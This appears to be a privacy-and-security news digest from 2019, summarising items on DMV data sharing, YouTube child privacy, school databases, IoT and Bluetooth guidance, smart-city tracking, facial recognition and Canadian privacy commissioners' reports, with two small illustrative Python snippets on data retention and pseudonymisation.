According to Department of Safety spokesman [Strategic Communications Administrator] Michael Todd, a six-year-old law [RSA 260-14-a] designed to prevent sharing of motor vehicle records with other states and the federal government prohibits New Hampshire from easily exchanging information about problem drivers with other states. While information is still exchanged, it is not done in a method that would violate the 2013 law, which prohibits providing DMV database records and extracts that contain personally identifiable information to state or federal governments. Todd would not provide detailed information about the systems that the NH Division of Motor Vehicles uses to exchange information with other states, saying: “It’s not a simple conversation. At this time, I can’t get into details. Most of the questions are not going to have a simple yes/no answer.” He noted that Gov. Chris Sununu ordered a review of New Hampshire’s tracking and notification system for problem drivers following the June 21 accident that killed seven motorcyclists in Randolph, New Hampshire [read coverage]. The pickup truck driver, Massachusetts resident Volodymyr Zhukovskyy, should have had his commercial driver’s license suspended, but Massachusetts did not properly log an impaired driving incident in Connecticut from the previous month. Last week, Massachusetts officials announced that Registry of Motor Vehicle workers stopped processing out-of-state violations beginning in March 2018, and 53 bins of unopened mail with thousands of notices were discovered in a records room at the Quincy office of the Registry of Motor Vehicles (RMV). The chairman of the New Hampshire House Transportation Committee said the law was only intended to prevent fishing expeditions involving broad swathes of data [not information about dangerous or suspended drivers]. Indeed, the law contains several [explicit] exemptions that allow for sharing via: 1) the National Driver Register and the Problem Driver Pointer System; 2) the Commercial Driver License Information System; 3) a national system used by law enforcement and a national system to compile information about automobile titles; and 4) any state-by-state system used to verify information from applicants for driver licenses and ID cards. Moreover, the American Association of Motor Vehicle Administrators [AAMVA] maintains a state compact system to track driver licenses and information about non-resident violators. New Hampshire joined the non-resident violator compact in 1982 and the driver license compact four years later, according to the AAMVA website. [New Hampshire Union Leader]

US – Conference of Mayors Passes Resolution Not to Pay Ransomware Demands

The US Conference of Mayors has passed a resolution stating that it “stands united against paying ransoms in the event of an IT security breach.” Baltimore Mayor Jack Young said that paying ransoms encourages the perpetrators and others to launch more attacks. Sources: www.scmagazine.com: U.S. mayors resolve to no longer pay ransomware attackers | statescoop.com: Mayors pass resolution against paying ransomware ransoms

US – FTC Mulls Disabling YouTube Ads to Protect Child Privacy

On July 1 the chairman of the Federal Trade Commission suggested that YouTube disable ads on certain content creators’ channels to limit the collection of data from children under 13 without parental consent [read Bloomberg coverage]. This was a counter to a proposal by YouTube — which is facing an FTC probe after being accused of illegally gathering data on children [read T.D. coverage] — to move all children’s content onto a separate platform [read WSJ coverage]. The Campaign for a Commercial-Free Childhood [CCFC] and the Center for Digital Democracy [CDD], the two groups the FTC reportedly contacted to talk through disabling ads on YouTube, wrote a letter on 3 July saying it isn’t “clear whether turning off interest-based advertising actually stops the data collection and tracking of the child” through the Google Marketing Platform [read 12 pg PDF letter]: “We are concerned about any remedy that would allow children’s content to remain on the main YouTube site and shift the burden of responsibility to content creators to opt out of ‘interest-based’ advertising”. However, according to Dylan Collins, chief executive officer of SuperAwesome [see here], moving all kids’ content to a separate platform may not be enough to solve YouTube’s problem: “Any product labelled as ‘kids’ simply won’t attract kids over the age of eight,” said Collins. “Additionally, the content that kids watch on YouTube today isn’t obviously ‘kids’ content [such as] sports videos and animal videos. So while it’s a good step, it doesn’t solve the issue of kids on YouTube.” He added that if YouTube shifts liability to content creators, then the majority will not self-identify as children’s content owners in order to continue monetizing their videos. [The Drum | Bloomberg]

US – 33 Organizations Ask Fla. Governor to Halt School Safety Database Plans

The Future of Privacy Forum and 32 other organizations have sent a letter to Florida Gov. Ron DeSantis calling for a “halt” to the state’s proposed school safety database, according to a press release. The letter comes a month after FPF published guidance on school safety and student privacy and was prompted by a recent Education Week report on Florida’s progress on the database, which would “track students who might be considered threats.” The organizations wrote that the database “represents a significant safety risk” due to the collection of “highly sensitive information without a clear, evidence-based rationale for inclusion.” Meanwhile, MediaPost reports lawyers for the Center for Digital Democracy and the Campaign for a Commercial-Free Childhood penned a letter to the U.S. Federal Trade Commission asking that it “insist Google remove all children’s content from YouTube in order to settle allegations that the company violated privacy laws.” [FerpaSherpa]

US – Fla. Gov. to Go Forward with School Safety Database Despite Criticism

Gov. Ron DeSantis, R-Fla., has denied recent requests to terminate the state’s school safety database and will continue to gather data that tracks students’ mental health. DeSantis put out a statement explaining the purpose and use of the database were being misinterpreted by the coalition of 33 organizations. DeSantis said the database functions as “a tool for threat assessment teams to evaluate the seriousness of individual cases and is not being used to label students as potential threats.” In response, the coalition criticized DeSantis’ attempts at reassurance, noting that the governor failed to fully clarify how the database will be used and what kinds of data will be collected. [Bay News]

US – Md. School District to Begin Annual Deletion of Old Student Data

Maryland’s Montgomery County Public Schools have taken up an annual purge of its databases that contain data of more than 162,000 students. Montgomery County is the first district in the state and one of just a handful of districts nationwide to take up the clearing venture. The “Data Deletion Week” will clear student internet histories from servers run by Google, Apple and GoGuardian, which offers services to help teachers manage classrooms and monitor students. GoGuardian CEO Advait Shinde said the purge “is a positive way to create a partnership between parents and schools on the management of data on school accounts that is used to provide a better and safer online learning experience.” [The Wall Street Journal]
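
Mechanically, such a purge is a simple retention job: anything older than a cutoff date is deleted. The sketch below shows the idea in Python against a hypothetical SQLite table; the real purge runs inside each vendor’s systems, so the table and column names here are purely illustrative:

    import sqlite3
    from datetime import datetime, timedelta

    RETENTION_DAYS = 365  # keep roughly one school year of history

    def purge_old_history(db_path):
        """Delete browsing-history rows older than the retention window."""
        # Assumes visited_at is stored as an ISO-8601 timestamp string.
        cutoff = (datetime.utcnow() - timedelta(days=RETENTION_DAYS)).isoformat()
        conn = sqlite3.connect(db_path)
        with conn:  # commits on success, rolls back on error
            deleted = conn.execute(
                "DELETE FROM browsing_history WHERE visited_at < ?", (cutoff,)
            ).rowcount
        conn.close()
        return deleted

    # purge_old_history("student_activity.db")  # e.g., run once a year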

RFID / IoT

US – NIST Publishes IoT Cybersecurity Guidance

Seemingly every appliance we use comes in a version that can be connected to a computer network. But each gizmo we add brings another risk to our security and privacy. So before linking your office’s new printer or coffee maker to the internet of things (IoT), have a look at an informational report from the National Institute of Standards and Technology (NIST) outlining these risks and some considerations for mitigating them. Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks (NISTIR 8228) [see here] is the first in a planned series of documents NIST is developing to help IoT users protect themselves, their data and their networks from potential compromise. Developed by the NIST Cybersecurity for IoT Program over more than two years of workshop discussions and interaction with the public, NISTIR 8228 is primarily aimed at federal agencies and other big organizations that are incorporating IoT devices into their workplace — organizations that may already be thinking about cybersecurity on a large-scale, enterprise level. Larger organizations may already be using the Cybersecurity Framework and NIST SP 800-53 Rev. 5. NISTIR 8228 takes the security and privacy focus from these other documents and considers it in the context of IoT products, from thermostats to voice-operated devices, which may not have traditional interfaces such as a keyboard. The report is a companion document to the Cybersecurity Framework and SP 800-53 Rev. 5. However, NISTIR 8228 offers only advice; none of its contents are requirements under the Federal Information Security Management Act (FISMA). After distinguishing IoT devices from conventional computers and outlining the type of risks they carry, the authors suggest three high-level risk mitigation goals:

  1. Protect device security, i.e., prevent an IoT device from being used to conduct attacks;
  2. Protect security of data, including personally identifiable information; and
  3. Protect individuals’ privacy.

In the near future, NIST plans to release a core baseline document that aims to identify fundamental cybersecurity capabilities that IoT devices can include. The document will have all IoT devices in mind, including those for individual users and home networks. According to Mike Fagan, a NIST computer scientist and one of the authors of the NISTIR 8228 report: “We plan to release a draft of the baseline document for public comment in July, and then we will hold a workshop on August 13 [read notice here] where we will gather feedback. We’d like to help all IoT users be aware of the risks to their security and privacy and help them approach those risks with open eyes.” [NIST News (National Institute of Standards and Technology) | Oregon’s New IoT Law]

CA – Canada Publishes New Drone Regulations

In Canada, the drone industry has nearly doubled in size every two years over the past decade. With that boom, Canadian regulators have been grappling with many of the same questions that the U.S. Federal Aviation Administration (FAA) has been struggling with as well — how do you safely incorporate drones into the airspace? To address this issue, Canada released, and made effective, regulations amending the Canadian Aviation Regulations for Remotely Piloted Aircraft Systems (Regulations). These new Regulations cover small drones that weigh between 0.55 lbs. and 55 lbs., and that are operated within the operator’s visual-line-of-sight. The operation of a drone over 55 lbs. requires a Special Flight Operations Certificate (SFOC). How do these new Regulations compare to the regulations effective in the U.S.? For example:

  1. All drones must be registered with Transport Canada and marked with a registration number regardless of the operator intent (i.e. commercial and hobbyists both must register);
  2. All drones must be flown at an altitude of less than 400 feet;
  3. Drones may not be flown over or within a secured perimeter established by a public authority in response to an emergency or “advertised events,” such as outdoor concerts, festivals or sporting events, unless the operator is granted a SFOC;
  4. Drone pilots must be at least 14 years old and complete an online knowledge exam, but for advanced operations (i.e. operations within controlled airspace; closer than 30 meters to a bystander; within three (3) nautical miles from an airport), the pilot must be at least 16 years old; and,
  5. For certain advanced operations, the drone must meet RPAS (i.e. Remotely Piloted Aircraft Systems) Safety Assurance standards before being flown (i.e. technical requirements).

There are many similarities between the Canadian and U.S. regulatory requirements and restrictions. However, one notable difference between the regulations is that the new Canadian regulations permit flights over people (defined as operations that are less than five (5) meters horizontally and at any altitude) provided that the manufacturer of the drone makes required declarations and that other requirements for “advanced operations” are complied with as well. Additionally, the Canadian regulations do not distinguish between recreational or commercial drone uses, and require operators to demonstrate flight proficiency for advanced operations. The FAA is working towards a rule for flights over people, but some of these other differences may be far down the road here. [Data Privacy + Security Insider (Robinson+Cole)]

WW – Google Employees Are Eavesdropping, Even In Your Living Room

Not everyone is aware of the fact that everything you say to your Google smart speakers and your Google Assistant is being recorded and stored. But that is clearly stated in Google’s terms and conditions. And what people are certainly not aware of, simply because Google doesn’t mention it in its terms and conditions, is that Google employees are systematically listening to audio files recorded by Google Home smart speakers and the Google Assistant smartphone app. Throughout the world, people at Google listen to these audio files to improve Google’s search engine. VRT NWS was able to listen to more than a thousand excerpts recorded via Google Assistant. They were provided by someone who works for a Google subcontractor and focussed on Dutch and Flemish speaking users. In these recordings, VRT could clearly hear addresses and other sensitive information, which made it easy to find the people involved and confront them with the audio recordings. Most of these recordings were made consciously, but Google also listens to conversations that should never have been recorded: at least 150 of the aforementioned 1,000, some of which contain sensitive information as well as recordings of a sexual and/or violent nature. The source let VRT take a look at the system that collects audio via Google Assistant. Thousands of employees worldwide use this system to listen to audio excerpts. In Flanders and Holland, around a dozen people listen to local recordings. Google subcontracts that task to outside professionals, who log in to a secure part of the tool that has a list of the audio excerpts they have to analyse. Knowing that people who work for Google indirectly are listening to such recordings raises questions about privacy. In order to avoid excerpts being automatically linked to a user, they are disconnected from the user’s information: the user name is deleted and replaced with an anonymous serial number. But, as shown in one of the videos accompanying the VRT article, it doesn’t take a rocket scientist to recover someone’s identity; you simply have to listen carefully to what is being said. What’s more, if they don’t know how a word is written, these employees have to look up every word, address, personal name or company name on Google or on Facebook. In that way, they often soon discover the identity of the person speaking. In a reaction to VRT’s report, Google admits that it works with language experts worldwide to improve speech technology. “This happens by making transcripts of a small number of audio files,” Google’s spokesman for Belgium says, adding that “this work is of crucial importance to develop technologies sustaining products such as the Google Assistant.” Google states that its language experts only judge “about 0.2 percent of all audio fragments.” These are not linked to any personal or identifiable information, the company adds (also read Google’s blog post response & justifications here). Google is not the only company that works this way. In April, the Bloomberg news agency revealed that American internet giant Amazon also does it. Bloomberg also had evidence that, just like Google, Apple subcontracted people to train its well-known Siri search assistant. [vrtNWS (Belgian public broadcaster) | Google is investigating the source of voice data leak, plans to update its privacy policies | Yep, human workers are listening to recordings from Google Assistant, too | How Amazon, Apple, Google, Microsoft, and Samsung treat your voice data | Amazon Workers Are Listening to What You Tell Alexa]
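
The weakness VRT describes is that replacing an account name with a serial number is pseudonymisation, not anonymisation: the direct identifier is removed, but the recording’s content can still identify the speaker. A toy illustration in Python, with an invented record:

    import hashlib

    record = {
        "user": "jan.peeters@example.com",  # invented account
        "transcript": "Navigate to Stationsstraat 12, Leuven, it's Jan's place",
    }

    # What reviewers see: the account identifier is replaced...
    pseudonymised = {
        "user": hashlib.sha256(record["user"].encode()).hexdigest()[:12],
        "transcript": record["transcript"],
    }
    print(pseudonymised)
    # ...but the audio still contains an address and a first name, so a
    # reviewer who listens carefully can work out exactly who is speaking.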

Security

CA – Canadian Centre for Cyber Security Issues Best Practices for Bluetooth

The Canadian Centre for Cyber Security has issued guidance on Bluetooth technology. Its recommendations include:

  • Avoid transferring sensitive information or passwords over Bluetooth connections
  • Turn off “discover mode” when not in use
  • Remove lost or stolen devices from the pairing list
  • Always verify that a listed device is known and trusted before pairing with it, and
  • Avoid pairing devices in rental cars (where one is paired, delete stored data and remove the device from the pairing list upon return).

Bluetooth-specific vulnerabilities:

  • Bluejacking: a threat actor sends unsolicited messages to Bluetooth-enabled mobile devices; they can connect to and remotely control the device if the message is responded to, or if they are added to the recipient’s address book.
  • Bluebugging: a threat actor poses as a device (e.g. headphones); personal information on the connecting device becomes available to the actor once it connects to the spoofed device.
  • Car whisperer: software that allows a threat actor to send or receive audio from the car kit installed in a vehicle; if exploited, threat actors could eavesdrop on conversations by receiving audio from the car microphone.
  • Crackle: a threat actor exploits flaws in the pairing process that allow key recovery so that devices can be accessed.
  • GATTack: an attacker mounts a man-in-the-middle attack to intercept, clone, block or change messages.

[Canadian Centre for Cyber Security – Using Bluetooth Technology]

Smart Cities and Cars

UK – London is Tracking Passengers on the Underground

London’s Underground has become the latest transportation system to use location data collected from people’s smartphones in a bid to improve services. Transport for London, which operates the Tube, began collecting data in its stations this week in order to determine how people are moving through the system and how crowded trains and platforms are. It said passengers will benefit as they will get more alerts about delays and congestion later this year. Extra trains could also be added on routes where the data indicates trains are especially congested. It’s become increasingly common in recent years for transportation organizations worldwide to use smartphone data to better plan services. They say digital data offers insights that greatly surpass previous methods, such as user surveys. But transportation experts believe London may have the first public transportation system to track and use individual trip data in real time. Given how large a system London operates, other cities may follow suit if the project succeeds. The practice also raises concerns about user privacy, unwanted tracking, potential hacks and the misuse of data. [CNN]

CA – Privacy Complaint Filed Over Tracking of Drivers’ Data by Their Cars

The Vancouver-based Freedom of Information and Privacy Association [FIPA] filed a complaint with the federal privacy commissioner, asking for an investigation of the gathering of drivers’ personal information by their vehicles. The complaint was filed along with FIPA’s 2019 update to its “Connected Car” report [read 35 pg PDF here – & for the 2015 version see here], which evaluates the privacy policies of 36 manufacturers to find what data they collected, how it was used, and why. The report estimates 98% of new cars in the U.S. and Europe will be connected to larger networks by 2021. These cars may collect travel data, monitor the driver’s typical speed and even the music they listen to. “Modern cars have become smartphones on wheels — mobile sensor networks, capable of gathering information about, and communicating with, their internal systems, other vehicles on the road, and local infrastructure,” said Canadian privacy commissioner Daniel Therrien in a statement to a federal standing committee in May 2018. “Privacy is first and foremost about not surprising people,” said David Fraser, a privacy lawyer with McInnes Cooper. “When things happen with your information that you weren’t expecting, that’s when you feel intruded on. That’s the creepy factor.” Fraser says companies also have to contend with the risk that a cyber-attack might reveal consumer data. For companies like car manufacturers, with limited experience in that realm, Fraser foresees an extra challenge. “All these things that used to be relatively simple have gotten much more complex,” he said. [Vancouver Sun]

CA – Toronto Leaders Urge Public Officials to ‘Welcome’ Sidewalk Labs’ Plan

A number of Toronto civic leaders, including former mayors, have written a joint statement urging public officials to welcome Sidewalk Labs’ Master Innovation Development Plan. The 30+ leaders say that Toronto should mobilize all of its talents to solve problems, including housing affordability. They write that public officials should “welcome and evaluate this proposal for the many positives it can bring.” The leaders behind the statement include Sharon Avery, the President and CEO of Toronto Foundation, Barbara Hall, the former mayor of Toronto, and Janet Ecker, the former Ontario finance minister. They acknowledge there are points worth debating in the plan but believe there is room for the government to negotiate and adjust it. [MobileSyrup | Business leaders push for Sidewalk Labs smart-city development to be built on Toronto’s waterfront | Apple Publicly Trolls Google Over Controversial Smart City Surveillance Plans | Commissioner recommends updating privacy laws to prepare for smart cities | Sidewalk Labs decision to offload tough decisions on privacy to third party is wrong, says its former consultant | Ann Cavoukian still has problems with Sidewalk Labs’ approach to data with Quayside | From heated bike lanes to privacy concerns: What you need to know about Sidewalk Labs]

Surveillance

CA – Civil Liberties Group Publishes CSIS Reports Related to Alleged Spying

The B.C. Civil Liberties Association has released thousands of heavily redacted documents disclosed by the Canadian Security Intelligence Service [CSIS] regarding allegations the agency had spied on peaceful protesters of the now-defunct Enbridge Northern Gateway Pipeline project; it has uploaded all the documents to a searchable website [see here]. The CSIS-disclosed documents had been held under a confidentiality order by the Security Intelligence Review Committee [SIRC], Canada’s spy agency watchdog, which recently expired. “What we’ve now received is a huge volume of secret evidence that we didn’t get to see at all before,” said lawyer Paul Champ, who’s representing the BCCLA. He told CBC’s Early Edition host Stephen Quinn the documents show over 500 CSIS reports about individuals or groups who had been protesting the pipeline proposal [listen here (7:30)]. The civil liberties association first challenged CSIS’ actions in 2014 with a complaint to SIRC alleging the agency was spying on pipeline opponents. The association further claimed the information was being shared with the National Energy Board and the petroleum industry. During private hearings with SIRC, CSIS disclosed the now-available documents. The complaint was dismissed, however, when the review committee concluded information had only been gathered on peaceful protesters as a by-product of investigations into legitimate threats, not as the goal. The BCCLA has been working to overturn the watchdog’s dismissal in Federal Court. [The remainder of this article covers topics under the following headers: 1) Retaining information on protesters; 2) ‘Something we don’t expect to experience’; and 3) CSIS questioned if it was going too far.] [CBC News | B.C. Civil Liberties Association releases Protest Papers showing CSIS surveillance of pipeline activists]

Telecom / TV

AU – Review Shows Australian Telecoms Receiving More Metadata Requests

While publishing their annual reports, three Australian government agencies revealed increases in metadata requests by law enforcement and other government entities. The Australian Securities and Investments Commission had a 44% increase in requests for prospective metadata and 25% for historic metadata. Meanwhile, the Independent Broad-based Anti-corruption Commission’s overall requests rose 11%, and the New South Wales Crime Commission saw increases of 153% for historic metadata and 106% for prospective metadata. Telecoms’ compliance costs related to the requests fell to $35 million from $119 million, according to the Australian Communications and Media Authority. [iTnews]

US Government Programs

US – Privacy and Civil Liberties Oversight Board Will Investigate NSA Surveillance, Facial Recognition, and Terror Watchlists

This week the Privacy and Civil Liberties Oversight Board [PCLOB], an independent agency in the executive branch, released a strategic plan that does not shy away from investigating some of the biggest threats to privacy in the U.S. The board will be looking into the NSA’s collection of phone records, facial recognition and other biometric technologies being used in airport security, and the processes that govern terrorist watchlists, as well as conducting what it calls “deep dive” investigations into the NSA’s XKEYSCORE tool and the CIA’s counterterrorism activity, among many other government programs and procedures. [DeepLinks Blog (EFF)]

+++

16-30 June 2019

Biometrics

WW – Manufacturer of Body Cameras Bans Facial-Recognition Technology

Axon, the country’s leading manufacturer of police body cameras, announced it is banning the use of facial-recognition technology on its devices. The company made the announcement after consulting with an outside committee of researchers. “After a year of meetings and research, Axon’s AI and Policing Technology Ethics Board concluded that face recognition technology is not yet reliable enough to justify its use on body-worn cameras, and expressed particular concern regarding evidence of unequal and unreliable performance across races, ethnicities, genders and other identity groups,” the independent ethics board wrote in a statement. Earlier this year, San Francisco became the first city to ban the use of facial-recognition technology by law enforcement agencies. [The Hill]

US – Lawmakers Question Why CBP’s Facial-Recognition Program Collected US Citizens’ Data

U.S. House Democratic lawmakers want to know why Customs and Border Protection’s Biometric Exit Program includes data collected from U.S. citizens. The purpose of the program is to track when non-citizens arrive and depart from the country. Currently, U.S. citizens can opt out of the program, which is used in 17 airports, but lawmakers say the ability to opt out of the program isn’t enough. “The random nature of this pilot does not allow travelers the requisite advanced notice to make an informed decision on their willingness to participate,” lawmakers said in a letter to the CBP. [Fedscoop]

US – PCLOB to Review Use of Facial Recognition, Biometrics by Airport Security

The U.S. Privacy and Civil Liberties Oversight Board has announced it is launching three new projects, including one that will examine the use of facial-recognition technology and other biometric tech by aviation security. “The aviation-security project will examine how facial recognition and other biometric technologies are used to verify identity at each phase of a journey, from booking to baggage claim,” PCLOB said in its release, adding that the project will consider privacy and civil liberties concerns, along with functional benefits. PCLOB will also conduct reviews of the Federal Bureau of Investigation’s data searches under Section 702 of the Foreign Intelligence Surveillance Act and the use of airline passenger name records. [PCLOB]

US – Portland Addresses Facial Recognition, City Data Use With New Resolution

Lawmakers in Portland, Oregon, have approved a privacy resolution that aims to regulate facial-recognition software and the general use and collection of data within the city. The resolution includes a set of privacy and information principles that will aid decision making related to tech and data. A highlight among the principles is a list of suggested approaches for assessing the impacts of automated decision systems that use artificial intelligence or algorithmic models. Facial recognition remains the main target of the resolution and its principles. “City use of facial recognition technologies is likely going to be an early policy conversation given recent media attention, community concerns, and related policies moving forward in other cities,” said Hector Dominguez, open data coordinator at the City of Portland’s SmartCityPDX group. [Geekwire]

Big Data | Data Analytics | Artificial Intelligence

US – Ill. Legislature Passes Artificial Intelligence Video Interview Act

The Illinois Legislature has passed the Artificial Intelligence Video Interview Act. Under the law, employers in the state cannot use AI to evaluate job interview videos unless, prior to the interview, they obtain the candidate's consent and inform the candidate that AI may be used to analyze the video, how the AI works, and the types of characteristics it will examine. Employers are not allowed to share the videos "except with persons whose expertise or technology is necessary in order to evaluate an applicant's fitness for a position." If signed by the governor, the bill would go into effect immediately. [Hunton Andrews Kurth's Privacy & Information Security Law Blog]

Canada

CA – OPC Shares Views on Legislative Reform

Privacy Commissioner Daniel Therrien shared his perspective on how federal privacy legislation should be amended during a keynote address May 23, 2019, at the IAPP Canada Privacy Symposium 2019. In his remarks, he noted that the starting point for modernization should be to give the law a rights-based foundation. Some excerpts: Privacy is more than a set of technical or procedural rules, settings, controls and administrative safeguards. Instead, it is a fundamental right and a necessary precondition for the exercise of other fundamental rights, including freedom, equality and, as we saw in Cambridge Analytica, democracy. I believe we have finally reached the point where the question of whether privacy legislation should be amended is behind us. The question before us now is how. With its announcement of a Digital Charter in the last few days, the government seems to agree. Legislative reform – for both PIPEDA and the Privacy Act – finally seems to be on its way. In recent months, we have been gratified to hear Parliamentary committees, and members of Parliament from all parties, saying that they support my office's calls to update our laws. The government has finally responded with its Digital Charter announcement [see here & here] with more specific proposals, although still somewhat general, notably in the area of privacy. At this point, we are still analyzing these proposals. They cover a wide variety of issues, but they also leave grey zones. For instance, if the law provides exceptions to consent for "standard business practices," how are privacy and the public good to be protected? The real question before us now is how Canada's laws should be updated. The starting point should be to give the law a rights-based foundation. We should continue to have a law that is technology neutral and principles-based. These elements will enable the law to continue to endure over time and provide a level playing field. Legislation should also define privacy in its broadest and true sense. Privacy is not limited to consent, access and transparency. These are important mechanisms but they do not define the right itself, a quasi-constitutional right as we all know. PIPEDA should be drafted as a real statute, conferring rights and imposing obligations; it should not be drafted as an industry code of practice. Judges have commented on the "peculiar" nature of PIPEDA's drafting. Others have been less charitable. The end result is that it is difficult to interpret and apply. It is possible to have principles-based legislation drafted intelligibly. We need look no further than the substantially similar legislation adopted by some provincial legislatures. Some of the other questions that should be addressed during a review of PIPEDA include consent, binding guidance and enforcement powers. Accountability is also an important theme; it has led us to revisit our position on transborder data flows. The historic OPC position gave great weight to the accountability principle in protecting privacy in a transborder context. Yet we have seen that this principle as currently framed does not always provide effective protection. During our Equifax investigation, company officials had difficulty answering basic questions as to who was responsible for their clients' personal information as between the Canadian and US affiliates. I must say I have read several interesting theories about what motivated this change in our position. No, I do not think I am Parliament.
No, I am not fixated on the GDPR, nor with consent for that matter. However, I am very focused on finding and applying effective solutions to protect the privacy of Canadians, consistent with the law. The proposal to change our position was ultimately based on our obligation to ensure that our policies reflect a correct interpretation of the current law. Our starting point was a straightforward question of statutory interpretation. In the meantime, we do not expect organizations to change their practices, although, if we receive individual complaints, we will need to assess them based on the specific facts of the case before us and our interpretation of the law in its current form. One option under legislative reform might again be to adopt a more robust accountability regime – demonstrable accountability with actual monitoring to ensure the arrangements in place truly protect personal information. Minister Bains seemed to move in that direction in his [recent] privacy proposals. We think consent is part of the short-term solution, and is perhaps dictated by the current law. But should it have a role in the longer term? Maybe not, as long as there are other effective ways to protect privacy. [OPC]

CA – Ontario IPC Releases 2018 Annual Report

On June 27 Commissioner Beamish released the IPC’s 2018 annual report, Privacy and Accountability for a Digital Ontario, where he calls for the modernization of Ontario’s privacy laws to address the risks posed by the increasing use of digital technologies [read PR, 2 pg backgrounder]. Since his appointment as commissioner in 2015, he has emphasized the need to update Ontario privacy laws, which continue to fall behind rapidly evolving digital technologies such as biometric sensors, big data analytics, and artificial intelligence. The technology available today has the potential to unlock many benefits for communities and enable governments to deliver services more effectively and efficiently. However, many collect, use, and generate massive amounts of data, including personal information. The use of data and technology must not come at the expense of privacy; Ontario needs an updated legislative framework that includes effective and independent oversight of practices related to personal information. Political parties are also able to collect sensitive personal information and use it in ways that we could not have previously imagined. These advancements have revealed a widening gap in the protection and oversight of individual privacy rights. The most effective way of holding political parties accountable for how they collect, use, and disclose our personal information is by making them subject to the privacy requirements set out in Ontario’s access and privacy laws. Amendments to provide regulation and oversight would demonstrate a commitment to accountability and respect for individual privacy. I have also recommended that Ontario’s health sector seek to update its approach to privacy protection. My report details the impressive results realized through the use of artificial intelligence to curb unauthorized access. These technologies can identify minute anomalies in network systems, signalling breaches in real time. I would like to see the widespread use of AI to address the ongoing problem of unauthorized access in the health sector. My 2018 annual report also reveals a troubling number of unauthorized disclosure incidents through misdirected faxes. The majority of the over 11,000 health information privacy breaches reported by the health sector were due to misdirected faxes or emails. This is unacceptable. In the United Kingdom, the Health and Social Care Secretary has banned the NHS from buying fax machines and intends to phase out their use by March 31, 2020. It is time for Ontario to follow the UK’s lead and implement a strategy to eliminate or reduce dependence on fax machines in the delivery of health care. As technologies evolve, so should our response to privacy risks. [OIPC Blog]

CA – SK OIPC Releases 2018-19 Annual Report

Ronald Kruzeniski, the Saskatchewan Information and Privacy Commissioner, released his 2018-19 annual report on June 27 [PR]. In it he calls for the “modernization of our access and privacy legislation to ensure new threats to privacy are sufficiently addressed and citizens are able to access public records with greater ease.” Some highlights in the report include:

  • Require trustees to obtain express consent before using recording or video devices to collect personal health information;
  • Clarify that an access to information request may be made on the prescribed form, in writing or electronically;
  • Mandate that trustees using electronic means to collect, use or disclose personal health information create, maintain and regularly audit records of user activity on those systems;
  • Explicitly state that access to manuals, policies, guidelines or procedures, if not on a government institution’s or local authority’s website, is provided free of charge;
  • Require all personal health information be stored in Canada;
  • Give the Commissioner the ability to comment on the privacy implications of new technology;
  • Include a section making access easier for those with disabilities; and
  • Streamline the fee structure and provide that no citizen pays if the costs are under $200.

Last year, the office of the privacy commissioner opened 324 files — 21 fewer than the year before. Of the 324 cases, 144 were investigations, 126 were reviews, 52 were consultations and two were disregarded. Out of the 95 reports filed last year, 46% of public bodies or trustees fully complied, 41% partially complied and 9% did not comply. Any public body or trustee involved in a report is required to respond to the recommendations within 30 days; however, last year, 3% of them did not. One way to speed up the process, he noted, is allowing public bodies or trustees to appeal to court should they disagree with a recommendation — something Kruzeniski added to this year’s report. The office of the privacy commissioner closed 287 files last year. When it comes to these files’ resolutions, 13% were informally resolved and 12% came to an early resolution. 45% of the cases went to a report and 18% involved consultations. 12% were not proceeded with. [CJME News (Regina) | Privacy commissioner hopes to protect personal info, but ease access for citizens]

CA – SK OIPC Pushes to Have Binding Recommendations

Saskatchewan’s information and privacy commissioner is pushing for legislation that would require any public body to appeal to the courts if it disagrees with a recommendation from his office. The recommendation comes as part of the privacy commissioner’s 2018-2019 annual report [read PR], which outlined the accomplishments of the past year and goals for the future. Currently, the office reviews or investigates a file — such as a citizen being denied a freedom of information request — and makes a recommendation to the body from which the information is being sought. That body can then choose to comply with the recommendation or ignore it. “The citizen only has the choice of going to court, spending $10,000 or $15,000 to get a judge to look at it and make an order,” said Kruzeniski. “I think that’s an unfair burden and it’s time that this be switched around.” Kruzeniski has made dozens of recommendations for changes to the Freedom of Information and Protection of Privacy Act (FOIP), the Local Authority Freedom of Information and Protection of Privacy Act (LA FOIP) and the Health Information Protection Act (HIPA), which together establish the access to information and privacy rights of citizens. Kruzeniski said his work moving forward (he was recently selected to serve a second five-year term) will be focused on persuading the provincial government and its opposition to modernize information and privacy legislation to keep up with the digital era and national trends. One of those trends is more ordering powers for provincial information and privacy commissioners. “The Northwest Territories has introduced legislation that contemplates something similar, the federal government in Bill C-58 has given the information commissioner some ordering powers,” said Kruzeniski, adding commissioners in British Columbia, Alberta, Ontario, Quebec, Prince Edward Island and Newfoundland and Labrador also have stronger legislative powers when it comes to binding recommendations. In the 2018-2019 fiscal year, the office received 324 files. The office closed 287 files in that time, 45% of which went to the report stage. Of the 95 reports issued, 46% fully complied with recommendations, 41% partially complied, 9% did not comply and 3% did not respond. [Regina Leader-Post]

CA – SK Insurance Company Allowed to Share Drivers’ License Information

Saskatchewan Government Insurance can share information about citizens for parking enforcement purposes. Information and Privacy Commissioner Ronald Kruzeniski released a report last week explaining that the use of names and addresses of registered vehicle owners was upheld in the courts, noting the information is not considered private or sensitive. Kruzeniski’s report comes after a complaint of improper personal data disclosure involving private parking company Impark. Kruzeniski has also recommended SGI ask the Ministry of Justice to examine an amendment to The Freedom of Information and Protection of Privacy Act that could change how the definition of personal information treats vehicle registration and license information. [CBC.ca | SGI can share your licence details without your consent, privacy commissioner confirms | SGI’s information handling causes stir]

CA – Opposition Leader Calls for NS OIPC to Have More Powers

Nova Scotia Opposition Leader Tim Houston called for the province’s information and privacy commissioner to have more legally binding powers. Houston’s comments come after it was announced the next court date for the Bay Ferries case will not occur until March 26, 2020. The province’s Progressive Conservatives attempted to find out how much of the $13.8 million in public funds to be paid to Bay Ferries will go to the company that operates the ferry service between Maine and Nova Scotia. Privacy Commissioner Catherine Tully had previously requested the information be made public. “If I have the privilege to be premier of this province I’m sure that giving order-making power to the privacy commissioner will at times cause a bit of embarrassment for the government,” Houston said. “But you have to take that. That will force better decision-making all along the way.” [Canadian Press]

Consumer

CA – Spy Agency Warns Campaign Teams ‘More Likely’ Targets of Cyber Attacks

